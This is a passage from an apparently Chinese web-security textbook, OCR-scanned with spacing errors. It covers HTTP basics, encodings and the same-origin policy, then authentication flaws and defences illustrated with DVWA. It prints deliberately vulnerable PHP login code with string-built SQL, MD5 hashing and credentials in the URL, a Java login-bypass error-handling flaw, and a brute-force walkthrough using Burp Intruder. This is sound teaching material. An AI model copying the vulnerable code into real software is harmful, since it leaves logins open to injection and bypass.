(3) Expires: 指示 响应 页 面 的 过 期 时 间 ,超出 该 时 间 后 ,浏览 器 就 不 需要 继续 缓存 该 
响应 。 

(4) Location: 用 于 在 重 定向 响应 中 指明 重 定向 的 目标 URL。 

(5) WWW-Authenticate: 用 于 提供 与 服务 器 所 支持 的 身份 验证 类 型 有 关 的 信息 。 

(6) Access-Control-Allow-Origin: 用 于 指示 是 否 可 以 通过 跨 域 请 求 获取 资源 。 

3. Cookie 属性 

除了 Cookie 的 实际 值 以 外 ,Set-Cookie 还 可 以 包含 以 下 属性 ,用 于 控制 浏览 器 处 理 
Cookie 的 方式 。 

(1) expires: 用 于 设 定 Cookie 的 有 效 时 间 , 浏 览 器 会 在 不 同 会 话 中 重复 利用 该 
Cookie 直到 超时 为 止 , 如 果 没 有 设置 该 属性 ,那么 Cookie 仅 用 于 当前 会 

(2) domain: 用 于 指定 Cookie 的 有 效 域 ,该 域 必须 与 收 到 Cookie 的 域 相同 或 者 是 其 
父 域 。 

(3) path: 用 于 指定 Cookie 的 有 效 URL 路 径 。 

(4) secure: 仅 允 许 在 HTTPS 请 求 中 提交 Cookie。 

(5) httponly: 禁止 JavaScript 访问 Cookie。 

4. HTTP 方法 

除了 常用 的 GET 和 POST 方法 外 ,HTTP 协议 还 支持 其 他 许多 为 了 特殊 目的 而 建 
立 的 方法 ,需要 关注 的 方法 如 下 : 

(1) HEAD。 它 与 GET 类 似 , 服 务 器 返回 的 消息 头 部 与 相应 GET 请 求 返回 的 消息 
头 部 相同 ,但 是 服务 器 不 返回 消息 主体 。 该 方法 用 于 检查 某 个 资源 是 否 存在 。 

(2) TRACE。 服 务 器 在 响应 的 消息 主体 中 返回 其 收 到 的 请 求 消息 的 全 部 内 容 , 用 于 
检测 浏览 器 和 服务 器 之 间 是 否 存在 任何 修改 请 求 的 代理 服务 器 。 

(3) OPTIONS。 请 求 服务 器 报告 它 针 对 指定 资源 所 支持 的 有 效 HTTP 方法 。 服 务 
器 通常 返回 包含 Allow 消息 头 的 响应 ,在 其 中 列 出 访问 该 资源 的 所 有 有 效 方法 。 

(4) PUT。 该 方法 是 用 包含 在 请 求 主 体 中 的 内 容 , 向 服务 器 上 传 指 定 资源 。 攻 击 者 
可 以 利用 它 上 传 可 执行 脚本 。 该 方法 较为 危险 ,通常 被 禁止 使 用 。 

5. 状态 码 

(1) 100 Continue: 当 浏 览 器 提交 一 个 包含 主体 的 请 求 时 ,该 响应 表示 已 经 收 到 请 求 
的 消息 头 部 ,浏览 器 应 该 继续 发 送 消息 主体 。 

(2) 201 Created: PUT 请 求 的 响应 返回 这 个 状态 码 , 表 示 请 求 已 经 成 功 提交 。 

(3) 301 Moved Permanently: 将 浏览 器 永久 重 定向 到 在 Location 字段 中 指定 
的 URL。 

(4) 302 Found: 将 浏览 器 暂时 重 定向 到 Location 字段 中 指定 的 URL。 

(5) 400 Bad Request: 客户 端 提交 了 一 个 无 效 的 HTTP 请 求 。 
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(6) 401 Unauthorized: HTTP 请 求 没有 通过 身份 验证 ,WWW-Authenticate 消息 头 
详细 说 明 所 支持 的 身份 验证 类 型 。 

(7) 405 Method Not Allowed: 服务 器 不 支持 请 求 中 使 用 的 HTTP 方法 。 

(8) 413 Request Entity Too Large: HTTP 请 求 消息 的 长 度 超出 限制 。 

(9) 414 Request URI Too Long: HTTP 请 求 的 URL 长 度 超 出 限制 。 


13.2.2 ”Web 程序 功能 


Web 程序 使 用 许多 不 同 的 技术 实现 其 功能 ,了 解 Web 程序 如 何 使 用 这 些 技术 它们 
的 运作 方式 和 可 能 的 弱点 有 助 于 更 好 地 理解 Web 攻防 技术 的 原理 。 

当 浏览 器 提交 HTTP 请 求 时 , 它 不 仅仅 是 要 求 访问 具体 的 某 个 资源 ,还 会 随同 请 求 
提交 许多 参数 ,这 些 参数 保证 了 Web 程序 可 以 生成 适合 用 户 需 求 的 内 容 。HTTP 请 求 
主要 按 以 下 方式 传送 参数 : 

(1) 通过 URL 查询 字符 串 。 

(2) 通过 HTTP Cookie。 

(3) 通过 在 请 求 主 体 中 使 用 POST 方法 。 

(4) 通过 HTTP 请 求 的 任何 一 个 部 分 作为 输入 。 

Web 程序 在 服务 端 使 用 大 量 技术 实现 其 功能 ,包括 脚本 语言 如 PHP、Python 和 
Perl, 应 用 程序 平台 如 ASP. NET 和 Java, Web 服务 器 如 Apache 和 IIS, 数 据 库 如 MS- 
SQL、MySQL 和 Oracle 等 。 

所 有 的 Web 程序 都 通过 浏览 器 进行 访问 ,它们 共享 相同 的 用 户 界面 ,但 是 建立 这 些 
界面 的 方法 却 各 不 相同 ,包括 HTML、 表 单 .CSS、JavaScript、VBScript、 文 档 对 象 模 型 
(DOM) .Ajax、JSON、HTML5 等 。 

浏览 器 实施 了 一 种 防止 不 同 来 源 的 内 容 相互 感染 的 关键 机 制 , 称 为 同 源 策略 (Same 
Origin Policy,SOP)。SOP 不 允许 从 一 个 站 点 收 到 的 内 容 访问 从 其 他 站 点 收 到 的 内 容 ， 
否则 , 当 一 个 不 知情 的 用 户 浏览 恶意 网 站 时 ,在 该 网 站 上 运行 的 恶意 脚本 将 能 够 访问 该 用 
户 正 在 访问 的 任何 其 他 网 站 的 数据 和 功能 ,例如 阅读 用 户 的 Web 邮件 。SOP 的 主要 特 
点 如 下 : 

(1) 一 个 域 中 的 页 面 可 以 向 另 一 个 域 提 出 任意 数量 的 请 求 ,但 是 该 页 面 无 法 处 理 上 
述 请 求 返回 的 任何 数据 。 

(2) 一 个 域 中 的 页 面 可 以 加 载 其 他 域 的 脚本 并 在 自己 的 域 中 执行 这 个 脚本 。 

(3) 一 个 域 中 的 页 面 无 法 读 取 或 修改 属于 另 一 个 域 的 Cookie 或 DOM 数据 。 


13.2.3 ”编码 方案 


Web 程序 可 以 对 数据 采用 多 种 不 同 的 编码 方案 ,确保 这 些 机 制 能 够 安全 处 理 不 常见 
的 字符 和 二 进 制 数据 。 攻 击 者 通常 需要 相关 方案 对 数据 进行 编码 以 绕 过 输入 确认 机 制 ， 
有 时 甚至 可 以 控制 Web 程序 所 使 用 的 编码 方案 。 

1. URL 编码 

URL 只 人 允许 使 用 ASCII 字符 集中 的 可 打印 字符 , 即 0x20 一 0x7e 的 字符 ,其 中 还 需 
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要 排除 一 些 在 HTTP 协议 内 有 特殊 含义 的 字符 。URL 编码 方案 用 于 对 扩展 ASCII 字符 
集中 的 任何 字符 进行 编码 ,使 其 通过 HTTP 安全 传输 。 所 有 URL 编码 的 字符 都 以 “%” 
为 前 缀 ,后 面 是 这 个 字符 的 两 位 十 六 进 制 ASCII 码 。 常 见 编码 如 “%20” 代 表 空 格 ,“% 
3d” 代 表 “ 二 ”,“%25” 代 表 “%”。 

2. Unicode 编码 

Unicode 是 一 种 统一 的 字符 编码 标准 ,为 支持 世界 上 各 种 不 同 的 编码 方案 而 设计 ,可 
以 采用 各 种 编码 方案 ,可 以 表示 Web 程序 中 的 不 常见 字符 。16 位 Unicode 编码 的 工作 
原理 与 URL 编码 类 似 , 以 “%u” 为 前 级 ,后 面 是 这 个 字符 的 十 六 进 制 的 Unicode 码 点 , 例 
如 “%u2215” 代 表 “/”。UTF-8 是 一 种 长 度 可 变 的 编码 标准 ,使 用 一 个 或 几 个 字 节 表示 每 
个 字符 。 多 字 节 字符 以 “%” 为 前 级 ,其 后 用 十 六 进 制 表 示 每 个 字符 ,例如 “%e2%89%a0” 
代表 “天 ”。 攻 击 者 常 使 用 各 种 标准 或 畸形 的 Unicode 编码 绕 过 输入 确认 机 制 。 

3. HTML 编码 

HTML 编码 用 于 将 问题 字符 安全 内 入 HTML 文档 ,因为 许多 字符 都 具有 特殊 含义 ， 
被 用 于 定义 文档 结构 而 非 其 内 容 。 为 了 安全 使 用 这 些 字符 ,必须 对 其 进行 HTML 编码 。 
例如 “&quot;” 代 表 双 引号 ,“&apos;” 代 表单 引号 ,“&lt” 代 表 “<”。 此 外 ,任何 字符 都 可 
以 使 用 它 的 十 进 制 ASCII 码 进 行 HTML 编码 ,例如 “&&#34” 也 代表 双 引 号 ,“& #39” 代 
表单 引号 。 也 可 以 使 用 十 六 进 制 ASCII 码 进行 HTML 编码 ,但 是 需要 增加 前 级 “x”, 例 
如 “&& # x22” 代 表 双 引号 ,“&& # x27” 代 表单 引号 。 攻 击 者 经 常 使 用 HTML 编码 进行 跨 
站 脚本 漏洞 的 查询 。 除 了 HTML 编码 之 外 ,Base64 编码 和 十 六 进 制 编码 也 常常 用 来 通 
过 HTTP 协议 传输 二 进 制 数据 。 


13.3 ”验证 机 制 的 安全 性 


验证 机 制 是 Web 程序 防御 恶意 攻击 的 中 心机 制 , 但 是 它 也 是 最 为 薄弱 的 一 个 环节 ， 
如 果 在 验证 机 制 中 存在 设计 或 实现 缺陷 ,攻击 者 就 可 以 得 到 非 授权 访问 。 常 见 的 Web 程 
序 验证 技术 包括 ， 

(1) 基于 HTML 表单 的 验证 。 绝 大 部 分 Web 程序 都 采用 这 种 机 制 ,客户 通过 
HTML 表单 提交 账号 和 密码 ,并 发 送 给 Web 程序 。 

(2) 多 元 机 制 ,包括 证 书 、 令 牌 等 。 主 要 应 用 在 安全 性 要 求 很 高 的 Web 程序 中 (如 网 
上 银行 ) ,客户 需要 提交 数字 证 书 或 类 似 U 盾 之 类 的 物理 令 牌 ,然后 双方 通过 SSL 协议 交 
换 一 次 性 会 话 密 钥 进行 保密 通信 。 

(3) HTTP 基本 和 摘要 验证 、 使 用 NTLM 或 Kerberos 整合 Windows 的 验证 。 一 般 
用 于 企业 内 部 网 络 。 

由 于 大 部 分 Web 程序 采用 基于 表单 的 验证 ,本 节 主 要 描述 这 种 验证 机 制 的 可 能 缺陷 
和 攻击 防御 方法 。 为 了 形象 地 说 明 有 关 技 术 原 理 , 本 节 和 后 面 章节 都 采用 DVWA 
(Damned Vulnerable Web Application) 0 这 个 Web 程序 漏洞 演示 网 站 作为 示例 ,DVWA 


@@ http://www. dvwa. co. uk, 基 于 PHP/MySQL 的 漏洞 演示 网 站 。 
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针对 常见 Web 安全 缺陷 分 别提 供 了 4 种 不 同安 全 级 别 的 实现 方案 (图 13-2) 。 
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图 13-2 DVWA 功能 和 安全 级 别 
13.3.1 设计 缺陷 


验证 机 制 的 设计 方案 可 能 存在 如 下 的 薄弱 环节 : 

(1) Web 程序 没有 在 建立 新 用 户 时 对 密码 强度 进行 控制 ,导致 用 户 使 用 较为 脆弱 的 
密码 ,如 空 密码 .与 用 户 名 相同 的 密码 或 者 直接 使 用 默认 密码 等 。 

(2) 没有 针对 可 能 的 弱 口 令 攻击 实施 防御 ,或 者 仅仅 在 客户 端 防止 弱 口 令 攻击 ,导致 
攻击 者 很 容易 利用 自动 工具 实施 暴力 攻击 。 

图 13-39 给 出 了 在 DVWA 中 实现 的 安全 性 较 低 的 验证 机 制 代码 , Web 程序 直接 从 
请 求 参 数 中 获取 用 户 输入 的 账号 和 密码 ,对 密码 进行 标准 MD5 散 列 后 , 送 入 数据 库 中 进 
行 匹配 ,如果 不 匹配 则 返回 失败 ,代码 没有 采用 任何 防御 机 制 。 在 获取 某 个 有 效 账 户 名 之 
后 ,攻击 者 可 以 使 用 BurpSuite 工具 中 的 Intruder 组 件 对 目标 发 起 弱 口 令 攻 击 。 图 13-4 
给 出 对 “admin? 账 户 进行 弱 口令 攻击 的 示例 , 当 口 令 正确 时 ,返回 的 HTTP 响应 消息 长 度 
明显 与 其 他 页 面 不 同 , 进 一 步 使 用 Comparer 组 件 比 较 两 个 不 同 的 响应 页 面 , 即 可 发 现 已 
经 破解 出 正确 的 密码 (图 13-5) 。 

(3) 提供 过 于 详细 的 验证 失败 信息 。 验 证 机 制 对 于 不 同类 型 的 失败 登录 事件 ,往往 
提供 不 同 的 错误 页 面 或 响应 方式 ,使 得 攻击 者 可 以 轻易 枚 举 Web 程序 的 大 量 有 效 账户 甚 
至 推测 有 效 密码 。 

Q@ 当 攻 击 者 输入 一 个 不 存在 的 账号 时 ,Web 程序 可 能 会 返回 “XX 账号 不 存在 ”的 错 
误 。 图 13-3 中 的 代码 返回 的 错误 信息 就 没有 造成 任何 的 信息 泄露 。 

@ 程序 处 理 失 败 登录 时 存在 多 条 代码 路 径 , 可 能 返回 差别 很 细微 的 不 同 页 面 。 

@ 有 效用 户 或 无 效用 户 登录 的 响应 时 间 可 能 存在 较 大 差别 。 


@ 代码 路 径 DVWA-master\vulnerabilities\brute\source\low. php。 
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<?php 
if( isset( $_GET[ 'Login'] ) ) { 
$user = $_GET[ 'username' ]; // 直 接 从 URL 参数 中 获取 账户 名 称 
$pass = $_GET[ 'password' ]; // 直 接 从 URL 参数 中 获取 密码 
$ pass = md5( $ pass ); // 对 密码 做 标准 MD5 散 列 
// 建 立 数据 库 查 询 
$query = "SELECT * FROM 'users'WHERE user = '$ user'AND password = '$ pass';"; 
$result = mysqli query(...); // 提 交 查 询 
if( $result && mysqli num rows( $result ) == 1){ // 找 到 一 条 匹配 结果 


//Get users details 

$row = mysqli fetch assoc( $ result ); 
$avatar = $row["avatar"]; 

//Login successful 


$html . = "<p> Welcome to the password protected area { $ user}</p>"; 
$html .= "<img src=\"{ $avatar}\" />"; 
} 
else { 
// 失 败 情况 下 ,注意 错误 消息 不 能 泄露 是 账号 名 错误 还 是 密码 错误 
$html .= "<pre><br /> Username and/or password incorrect.</pre>"; 
} 
((is null($___mysqli res = mysqli close( $GLOBALS[" __mysqli_ston"]))) ? false : 


$___mysqli res); 
i 
?> 
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@ 当 账 户 锁定 时 ,对 用 户 提 交 正 确 密码 或 错误 密码 的 响应 页 面 存 在 差别 。 

(4) 密码 传输 没有 使 用 安全 的 HTTPS 协议 ,或 者 使 用 HTTPS 协议 但 Web 程序 处 
理 密 码 的 方式 不 够 安全 ,导致 密码 被 截获 。 

QO 在 URL 的 查询 字符 串 参 数 中 而 不 是 在 POST 请 求 主体 中 传送 密码 信息 ,URL 信 
息 会 记录 在 服务 器 日 志和 浏览 器 历史 记录 中 ,因此 密码 很 容易 泄露 ,图 13-3 的 代码 就 属 
于 这 种 情况 。 

@ 有 时 Web 程序 会 将 POST 登录 请 求 的 HTML 表单 重 定向 到 一 个 URL ,然后 以 
查询 字符 串 参 数 的 形式 提交 密码 。 

@ Web 程序 常常 将 密码 保存 在 Cookie 中 ,即使 Cookie 中 的 密码 被 加 密 也 无 济 于 
事 , 攻 击 者 只 要 获得 Cookie 即 可 冒充 该 用 户 登 录 。 

@ Web 程序 在 加 载 登录 页 面 时 使 用 HTTP 协议 ,而 在 提交 账户 密码 时 才 切 换 到 
HTTPS 协议 。 由 于 用 户 无 法 确认 登录 页 面 的 真实 性 ,攻击 者 可 以 实施 MITM 攻击 , 欺 
骗 用 户 输入 真实 密码 。 

(5) 脆弱 的 密码 修改 功能 。 典 型 的 密码 修改 功能 需要 确认 用 户 、 验 证 现 有 密码 、 集 成 
账户 锁定 、 对 提交 的 新 密码 进行 比较 、 检 查 密码 强度 、 以 适当 方式 返回 错误 信息 等 ,其 中 可 
能 的 设计 缺陷 包括 : 

a 无 须 验证 即 可 访问 该 功能 ; 

@ 提供 详细 的 错误 信息 ; 

@ 允许 攻击 者 无 限制 猜测 * 现 有 密码 ”。 

(6) 脆弱 的 密码 找 回 功能 。 

@ Web 程序 常常 在 用 户 注册 时 要 求 用 户 设计 若干 问题 在 密码 找 回 时 使 用 ,但 是 许多 
用 户 提交 的 问题 十 分 简单 ,例如 “母亲 的 生日 是 哪 天 ”最 喜欢 的 颜色 是 什么 ”等 问题 的 管 
案 比 较 容 易 猜 中 。 

@ 允许 无 限制 地 回答 密码 找 回 的 问题 。 

@ 提供 密码 暗示 功能 ,用 户 会 以 为 只 有 自己 才 会 看 到 该 暗示 。 

@ Web 程序 在 用 户 成 功 回答 若干 问题 后 ,立即 允许 用 户 重新 控制 他 们 的 账户 。 这 非 
常 不 安全 ,应 该 向 用 户 在 注册 阶段 提交 的 电子 邮箱 发 送 一 个 唯一 的 、 无 法 猜测 的 、 存 在 时 
间 限 制 的 恢复 URL。 

(7) 脆弱 的 “ 记 住 我 功能 。 该 功能 为 了 方便 用 户 , 避 免 他 们 在 特定 计算 机 上 重复 输 
入 账号 和 密码 ,可 能 的 设计 缺陷 包括 : 

Oz 将 账号 名 称 直 接 放置 在 Cookie 中 ,如 “PermanentUser 二 fguo”, 攻 击 者 只 要 知道 
该 账号 名 称 , 即 可 伪造 该 Cookie 并 冒充 用 户 登 录 。 

@ 在 Cookie 中 使 用 持久 会 话 标记 ,攻击 者 只 要 得 到 该 标记 , 即 可 冒充 用 户 登 录 。 

(8) 采用 可 预测 的 自动 方式 生成 账号 名 称 和 初始 密码 。 攻 击 者 只 要 收集 一 定数 量 的 
有 效 账 户 名 和 初始 密码 , 即 可 推断 出 其 他 有 效 账 户 名 称 和 相应 的 初始 密码 ,从 而 假冒 其 他 
用 户 登 录 。 
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13.3.2 实现 缺陷 


由 于 在 实现 时 存在 缺陷 ,即使 精心 设计 的 验证 机 制 也 可 能 非常 不 安全 ,这 些 缺 陷 可 能 
导致 信息 泄露 ,完全 绕 开 登 录 或 者 弱化 验证 机 制 的 总 体 安全 。 
1. 错误 处 理 实现 缺陷 
图 13-6 给 出 了 一 段 有 缺陷 的 错误 处 理 代 码 , 如 果 攻 击 者 送 入 空 的 用 户 名 或 者 密码 ， 
db. getUser 方法 会 产生 异常 ,导致 绕 过 验证 机 制 成 功 登录 ,从 而 可 以 获取 敏感 数据 。 
public Response checkLogin(Session session) { 
try{ 
String name = session. getParameter("username" ); 
String pass = session. getParameter("password" ); 
User user = db. getUser(name, pass); 
if (user == null) { // 登 录 失 败 
return doLogin( session); 
} 
} 
catch (Exception e) {} // 捕 获 异常 后 ,没有 做 处 理 , 验证 代码 会 继续 向 下 执行 
session. setMessage( "Login succeeds. "); 
return doMainMenul( session); 


图 13-6 错误 处 理 实现 缺陷 


2. 多 阶段 登录 缺陷 

多 阶段 登录 机 制 可 以 提高 登录 的 安全 性 ,首先 要 求 用 户 通过 账号 名 称 确认 自己 的 身 
份 ,然后 再 执行 各 种 验证 检查 。 在 执行 过 程 中 ,多 阶段 登录 机 制 可 能 会 对 用 户 与 Web 程 
序 的 交互 方式 做 出 不 安全 的 假设 ,包括 : 

(1) 认为 访问 第 三 阶段 的 用 户 已 经 成 功 完成 第 一 和 第 二 阶段 的 验证 。 攻 击 者 可 能 直 
接 从 第 一 阶段 进入 第 三 阶段 ,使 得 只 拥有 部 分 证 书 的 攻击 者 能 够 成 功 登录 。 

(2) 信任 前 面 阶段 已 经 确认 为 正确 的 数据 。 攻 击 者 可 以 在 后 续 阶 段 的 请 求 中 修改 这 
些 数据 ,从 而 只 需要 部 分 证 书 就 可 以 成 功 登录 。 

(3) 认为 每 个 阶段 的 用 户 身份 不 会 变化 ,不 在 每 个 阶段 重新 确认 用 户 身 份 。 攻 击 者 
可 以 在 不 同 阶段 提供 不 同 用 户 的 有 效 数 据 。 例 如 ,攻击 者 拥有 自己 的 令 牌 并 且 发 现 其 他 
用 户 的 密码 , 则 能 够 以 该 用 户 的 身份 成 功 登录 。 

3. 证 书 存 储 缺 陷 

如 果 Web 程序 以 不 安全 的 方式 存储 登录 密码 ,那么 即使 验证 过 程 不 存在 缺陷 ,验证 
机 制 的 安全 性 也 会 被 前 弱 。 许 多 程序 直接 在 数据 库 中 明文 存储 密码 ,或 者 使 用 MD5 和 
SHA-1 等 标准 算法 对 密码 进行 散 列 处 理 , 这 些 都 是 十 分 危险 的 操作 。 因 为 攻击 者 可 能 利 
用 程序 的 其 他 漏洞 访问 数据 库 中 的 信息 ,从 而 窃取 明文 密码 ,即使 使 用 散 列 处 理 ,攻击 者 
也 可 以 通过 网 络 上 存在 的 标准 散 列 数据 库 去 查找 窃取 到 的 散 列 码 ,从 而 获得 明文 密码 。 
因此 ,安全 的 做 法 是 采用 加 盐 (salt) 散 列 的 方式 存储 用 户 密码 。 
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13.3.3 保障 验证 机 制 的 安全 


执行 安全 的 验证 解决 方案 需要 满足 若干 关键 安全 目标 ,有 时 需要 牺牲 易 用 性 和 总 成 
本 。 鉴 于 验证 漏洞 的 多 样 性 ,Web 程序 员 会 选择 接受 某 些 威胁 ,集中 精力 阻止 最 严重 的 
攻击 。 在 实现 防御 平衡 的 过 程 中 ,需要 考虑 以 下 因素 : 

(1) 程序 提供 的 功能 的 安全 程度 。 

(2) 用 户 对 不 同类 型 的 验证 控制 的 容忍 和 接受 程度 。 

(3) 支持 一 个 不 够 友好 的 界面 系统 所 需 的 成 本 。 

(4) 实施 安全 措施 的 成 本 与 需要 保护 的 资产 价值 间 的 关系 。 

为 避免 第 13. 2. 1 节 中 的 各 种 缺陷 ,本 节 介 绍 一 些 最 为 有 效 的 防御 方法 。 

1. 使 用 可 靠 的 证 书 

(1) 应 该 强制 执行 密码 强度 要 求 ,包括 最 小 密码 长 度 、 使 用 至 少 三 类 字符 、 避 免 以 用 
户 名 为 密码 .避免 使 用 以 前 用 过 的 密码 ; 为 不 同类 型 的 用 户 设置 不 同 的 密码 强度 。 

(2) 系统 生成 的 账户 和 密码 应 该 具有 足够 的 随机 性 ,不 包含 任何 可 预测 的 规律 或 

(3) 允许 用 户 设置 足够 强大 的 密码 ,允许 在 密码 中 使 用 任意 类 型 的 字符 。 

2. 安全 处 理 证 书 

(1) 使 用 SSL 协议 保护 浏览 器 与 服务 器 之 间 的 所 有 通信 ,不 需要 采用 定制 解决 方案 。 

(2) 必须 保证 使 用 HTTPS 协议 加 载 登 录 表 单 ,避免 MITM 攻击 。 

(3) 只 能 使 用 POST 方法 传输 证 书 , 绝 不 能 在 URL 参数 或 者 Cookie 中 ,也 不 能 将 证 
书 返回 给 浏览 器 。 

(4) 使 用 加 盐 方法 对 密码 进行 散 列 处 理 ,使 用 强大 的 散 列 方法 如 SHA-512 。 

(5)“ 记 住 我 ”功能 应 该 只 保存 用 户 名 信息 ,不 应 保存 密码 等 安全 证 书 。 

3. 正确 确认 证 书 

(1) 对 验证 逻辑 的 伪 代 码 和 实际 的 程序 源码 进行 仔细 的 代码 审查 ,以 确定 逻辑 处 理 
错误 。 

(2) 对 多 阶段 登录 进行 严格 控制 ,防止 攻击 者 破坏 登录 阶段 之 间 的 转换 关系 。 

QO 中 间 阶 段 的 所 有 数据 应 该 保存 在 服务 器 的 会 话 对 象 中 , 绝 不 能 传 给 浏览 器 或 允许 
其 读 取 。 

@ 在 每 个 阶段 ,都 必须 确认 前 面 的 阶段 已 经 顺利 完成 ,否则 必须 立即 拒绝 该 请 求 。 

@ 不 允许 用 户 多 次 提交 相同 的 登录 信息 ,禁止 用 户 修改 已 经 确认 的 数据 。 

@ 无 论 在 哪个 阶段 拒绝 登录 请 求 , 只 显示 相同 的 登录 失败 消息 ,不 提供 失败 位 置 的 
任何 信息 。 

4. 防止 信息 泄露 

(1) 不 能 让 攻击 者 判定 是 提交 的 哪些 请 求 参 数 出 现 问 题 ,也 不 能 让 他 们 知道 是 哪个 
阶段 被 拒绝 。 

(2) 使 用 一 个 独立 的 代码 组 件 返 回 一 个 常规 消息 ,负责 响应 所 有 的 失败 登录 请 求 。 

(3) 实现 账户 锁定 时 ,不 要 明确 告知 锁定 标准 ,而 只 是 发 出 常规 消息 : 如 果 出 现 多 次 
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失败 ,账户 将 被 冻结 ,请 稍 后 再 试 (图 13-7)。 


<?php 
if( isset( $_POST[ 'Login'] ) ) { 
$user = $_POST[ 'username' ]; // 通 过 POST 表单 发 送 用 户 名 
$user = ... // 净 化 用 户 输入 
$pass = $_POST[ 'password' ]; 
$ pass = ... // 净 化 用 户 输入 
$pass = md5( $ pass ); 
$ total_failed login = 3; // 设 置 最 大 尝试 次 数 
$ lockout time = 15; // 设 置 账 户 锁定 时 间 
$account locked = false; // 账 号 锁定 标记 


// 使 用 参数 化 查询 方式 进行 数据 库 查 询 , 首先 检测 用 户 是 否 已 经 被 锁定 ; 如 果 失败 次 数 已 经 超过 

// 最 大 尝试 次 数 并 且 距 离 上 次 锁定 时 间 还 没有 超过 15min, 则 设置 锁定 标记 

$data = $db—> prepare( 'SELECT failed login, last login FROM users WHERE user = 
(:user) LIMIT 1;' ); 


if( ( $data-> rowCount() == 1 ) &&( $rowl 'failed login'] >= $ total failed login ) ) 
{ 


if( $timenow> $ timeout ) 
$account_locked = true; 
} 
// 检 测 账号 密码 是 否 匹配 ,注意 不 论 账 号 是 否 锁定 ,依然 执行 数据 库 查 询 , 以 避免 执行 时 间 不 
// 一 致 的 问题 
$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = 
(:password) LIMIT 1; ' ); 


if( ( $data-> rowCount() == 1 ) && ( $account locked == false ) ) { // 登 录 成 功 


$html . = "<p> Welcome to the password protected area <em>{ $ user}</em></p>"; 


// 通 知 用 户 前 面 的 失败 次 数 ,并 且 清除 以 前 的 失败 次 数 


} 
else { // 登 录 失 败 的 处 理 
sleep( rand( 2, 4 ) ); // 设 置 随机 的 睡眠 时 间 , 以 保证 与 成 功 响 应 的 处 理 时 间 相 同 
$html . = "<pre>< br /> Username and/or password incorrect.< br /> < br/> Alternative, 
the account has been locked because of too many failed logins.< br /> If this is the case，< em > 
please try again in { $ lockout_time} minutes </em>.</pre>"; 
// 更 新 失败 次 数 ,更 新 最 新 的 登录 时 间 
} 
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5. 防止 暴力 攻击 

(1) 使 用 无 法 预测 的 用 户 名 ,阻止 用 户 名 枚 举 。 

(2) 实施 账户 锁定 策略 ,虽然 该 策略 允许 攻击 者 对 合法 用 户 实施 拒绝 服务 攻击 
(图 13-8)。 
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Cookie: y= 
Connection: close 





密码 在 POST 表 单 中 
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图 13-8 针对 DVWA 账户 锁定 机 制 的 弱 口 令 攻击 失败 


(3) 使 用 CAPTCHA(Completely Automated Public Turing Test-to-tell Computers 
and Humans Apart, 全 自动 区 分 人 类 和 计算 机 的 图 灵 测 试 ) 应 答 防 御 暴 力 攻击 , 绝 不 要 把 
问题 的 答案 隐藏 在 HTML 表单 中 。 

(4) 如 果 采 用 账户 临时 锁定 策略 ,必须 保证 : 

J@ 不 能 透露 任何 账户 冻结 信息 ,不论 攻击 者 提交 有 效 或 无 效 的 账户 和 密码 ,都 只 返 
回 相同 的 消息 。 

@ 不 能 透露 任何 的 账户 锁定 标准 。 

@ 如 果 账 户 被 冻结 ,可 以 直接 拒绝 该 账户 登录 ,而 不 用 检查 用 户 证 书 。 但 是 为 了 防 
止 攻击 者 利用 服务 器 响应 的 时 间 差 异 进行 用 户 名 枚 举 , 可 以 随机 等 待 一 段 时 间 再 返回 响 
应 (图 13-8) 。 

针对 图 13-7 的 验证 机 制 ,采用 与 图 13-4 相同 的 方式 进行 弱 口令 攻击 ,结果 如 图 13-8 
所 示 。 当 失败 尝试 超过 3 次 以 后 ,不 论 是 正确 密码 还 是 错误 密码 ,返回 的 页 面 长 度 都 相 
同 ,页 面 内 容 如 图 13-9 所 示 。 

6. 防止 滥用 密码 修改 功能 

(1) 只 能 从 已 经 通过 验证 的 会 话 中 访问 密码 修改 功能 。 

(2) 不 要 以 任何 方式 直接 提供 账户 名 称 , 如 隐藏 表单 字段 或 Cookie。 

(3) 必须 要 求 用 户 重新 输入 现 有 密码 。 

(4) 新 密码 必须 输入 两 次 ,并 且 必 须 进 行 比较 ,检测 是 否 匹 配 。 

(5) 应 该 使 用 常规 错误 消息 告知 用 户 现 有 密码 中 的 任何 错误 ,如 果 修改 密码 的 尝试 
失败 几 次 ,应 该 临时 锁定 该 功能 。 
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Vulnerability: Brute Force 





Login 


Usemame: 





Login 
使 用 常规 错误 消息 ， 攻 击 者 无 法 获得 由 价值 的 信息 


Usernane and/or password incorrect. 


Alternative, the account has been locked because of too nany failed logins. 
IE this is the case, ploease try again in 15 ninmtes, 








More Information 


» https:/www.owasp.org/index.php/Testing for Brute Force {OWASP-AT-004} 
。 http://www.symantec.com/connect/articles/password-crackers-ensuring-security-y 
。 http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.h 





四 
中 
如 
-| 


图 13-9 安全 错误 消息 示例 


(6) 应 该 使 用 电子 邮件 等 方式 通知 用 户 其 密码 已 经 被 修改 ,但 是 不 要 在 通知 中 出 现 
任何 的 新 密码 或 原 密码 。 

7. 防止 滥用 密码 找 回 功能 

(1) 不 要 使 用 密码 暗示 之 类 的 特性 。 

(2) 通过 用 户 注册 时 登记 的 电子 邮件 发 送 一 次 性 恢复 URL 是 帮助 用 户 重 新 获得 账 
户 的 最 佳 解 决 方案 。 用 户 访问 该 URL 即 可 获得 新 密码 ,然后 向 用 户 发 出 另 一 封 邮件 说 
明 密 码 已 经 修改 。 

(3) 设计 密码 找 回 问题 时 应 保证 不 会 引入 新 的 漏洞 。 

Q@ 对 相同 的 用 户 始终 提出 同一 个 或 同一 组 问题 。 

@ 问题 的 答案 必须 具有 足够 的 随机 性 ,确保 攻击 者 无 法 轻易 推测 。 

@ 如 果 多 次 回答 均 告 失败 ,应 该 临时 锁定 账户 。 

@ 如 果 回 答 错 误 , 不 要 泄露 任何 有 关 信 息 。 

@ 回答 成 功 后 ,向 用 户 注 册 的 邮箱 发 送 一 封包 含 激 活 URL 的 电子 邮件 。 


13.4 会话 管 理 的 安全 性 


会 话 管理 用 于 帮助 Web 程序 从 大 量 不 同 请 求 中 确认 不 同 用 户 , 并 处 理 用 户 与 Web 
程序 交互 状态 的 数据 。 如 果 攻 击 者 能 够 破坏 会 话 管理 机 制 ,他 就 可 以 假冒 其 他 用 户 , 如 果 
可 以 假冒 管理 员 , 那 么 他 就 可 以 控制 整个 Web 程序 。 会 话 管理 最 常见 的 方法 就 是 向 每 位 
用 户 发 布 一 个 唯一 的 会 话 令 牌 ,用 户 随后 在 每 次 HTTP 请 求 中 都 提交 这 个 令 牌 ,表示 该 
